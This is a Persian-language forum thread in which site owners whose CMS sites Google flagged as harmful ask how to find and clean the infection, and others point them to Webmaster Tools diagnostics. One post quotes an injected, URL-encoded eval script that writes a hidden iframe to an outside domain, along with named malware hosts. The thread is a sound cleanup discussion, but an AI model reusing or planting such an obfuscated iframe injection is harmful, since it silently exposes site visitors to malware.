با سلام

یکی از سایت هام که به صورت cms هست بعد از 9-8 ماه با مشکل مواجه شده و پیغام وحشتناک :

This site may harm your computer.

رو تو سرچ گوگل دریافت می کنه.

متن خطای گوگل اینه :



Safe Browsing

Diagnostic page for mySite.ir

What is the current listing status for mySite.ir?
Site is listed as suspicious - visiting this web site may harm your computer.
Part of this site was listed for suspicious activity 2 time(s) over the past 90 days.
What happened when Google visited this site?
Of the 2 pages we tested on the site over the past 90 days, 2 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2010-03-26, and the last time suspicious content was found on this site was on 2010-03-26.Malicious software includes 1 scripting exploit(s), 1 virus. Successful infection resulted in an average of 3 new process(es) on the target machine.
Malicious software is hosted on 1 domain(s), including trenz.pl/ (http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=trenz.pl/).
This site was hosted on 1 network(s) including AS32244 (LIQUID) (http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=AS:32244).
Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, mySite.ir did not appear to function as an intermediary for the infection of any sites.
Has this site hosted malware?
No, this site has not hosted malicious software over the past 90 days.
How did this happen?
In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.
Next steps:


Return to the previous page.
If you are the owner of this web site, you can request a review of your site using Google Webmaster Tools (http://www.google.com/webmasters/tools/). More information about the review process is available in Google's Webmaster Help Center (http://www.google.com/support/webmasters/bin/answer.py?answer=45432).




البته می گم 9-8 ماه ولی تو این مدت تغییراتی توش دادم.
تا جایی که بررسی کردم متوجه شدم که باید اول برم سراغ چند سری صفحات و کدها یعنی اون هایی که از طریق کوئری استرینگ یا یه فرم داده هایی رو دریافت می کنن و بدون بررسیشون اونها رو در ذخیره می کنن.

شاید لازم باشه بگم که من تو کوکی هام اطلاعات خیلی مهمی نمی ذارم و نهایت یه اسم کاربری و ایمیله که بدون پسورد معنی نداره. اینو گفتم چون اگه حمله ی xss ی در کار باشه فکر می کنم کوکی ها خیلی خوشمزه به نظر می رسن و هدف اصلیند.



اول می خوام بدونم که دلیل اصلی این ایراد چی می تونه باشه؟
بعد هم اگه میشه یه راهنمایی می خوام که از بین دو سه هزار فایل چطور فایل های تخریب شده رو (اگر فایلی تخریب شده) بشناسم؟
و اینکه چطور صفحه های مشکوک رو باید تشخیص بدم؟

متشکر میشم اساتید راهنماییم کنند، بد رقم لنگم. می دونید پیآمد این مشکل ها در دید مشتری چیه دیگه. مرسی.

سلام دوستان من هم چنین مشکلی دارم
اگه ممکنه دوستان بگن چطوری میشه این مشکل رو رفع کرد.
با تشکر

یکی از دلایل

توی یکی از صفحاتت کد internetcountercheck وجود دارد
این یه ویروسه راه حل های زیادی برای کشتن این ویروس وجود داره
اسمشو توی اینترنت سرچ کنید

ابتدا باید سایت تون رو در Google Webmaster Tools در آدرس https://www.google.com/webmasters/tools ثبت و تایید کنید. سپس در آدرس فوق به بخش Diagnostics و گزینه Malware مراجعه کنید. در صفحه فوق دلیل بلوک شدن سایت شما و صفحه های آلوده فهرست خواهند شد.

آقا من همچين مشكلي دارم
internetcountercheck تو صفحاتم هست
cms هم پاك شده ولي بازم گير ميده؟

اگر مراحلی که در پاسخ شماره 4 گفتم رو انجام بدی در کنترل پنل Webmaster Tools در گوگل آدرس صفحه های آلوده و کد آلوده در هر یک از صفحات رو بهت نشون میده.

بعد از اینکه سایت ات رو در آدرس فوق ثبت و Verify کردی و صفحات آلوده رو اصلاح/حذف کردی میتونی یک Request for Review ثبت کنی تا سایتت رو بررسی کنند. اگر رفع آلودگی شده باشه خودشون از لیست سایت های مخرب حذفش می کنند.

من سایت add کردم و در بخش Diagnostics و گزینه Malware انتخاب می کنم. دو مورد گفته که به صورت زیر است
Suspected injected code
<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%6 9%
74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22 %68%74%74%
70%3A%2F%2F%73%65%64%76%62%2E%63%6F%6D%2F%22%20%77 %69%64%74%
68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66 %72%61%6D%
65%3E%27%29'));</script>
از کجا بفهمم چه صفحه ای مشکل دارد؟

این کد مشکوکه. این کد را اول از سایتت پاک کن. اگر از وبگذر استفاده می کنی اون را پاک کن. اگه از آژاکس برای اتصال به دامنه های دیگه استفاده می کنی اون را غیرفعال کن. خلاصه کدی که گوگل بهت داده، کدیه که گوگل بهش مشکوک شده و برای همین سایتت را بسته